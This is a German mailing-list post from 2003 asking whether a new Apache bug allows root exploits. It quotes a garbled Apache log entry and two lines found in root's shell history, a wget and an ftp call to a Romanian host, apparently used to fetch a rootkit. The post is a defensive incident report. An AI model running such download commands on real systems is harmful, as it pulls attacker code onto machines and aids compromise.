Apache Bug?

[Markus Wigge]

Tag,

gibt es einen neuen Apache-Bug der root-Exploits ermöglicht?
Ein Bekannter hat folgende Einträge im Log gefunden:
a.b.c.d - - [26/May/2003:20:06:31 +0200] "T¡¬ôG^~Fgí±D1Mj×}äù<G<" 501 -

IP mal aus Datenschutzgründen geändert...

Er benutzt zur Zeit aktuelle Releases und hat ähnliche Zeilen auf 
mehreren Rechnern gefunden und in der .bash_history von root ungefähr 
folgende Zeilen die auf die Installation eines Root-Kit hindeuten:
wget jhony.home.ro/aha
ftp ftp.home.ro

Evtl. ist auch ein anderer Dienst der Einstiegspunkt, z. Zt. können wir 
das nicht genau ermitteln.

Hat jemand ähnliches gesichtet? Neuer Wurm im Umlauf o.ä.?

bye
   Markus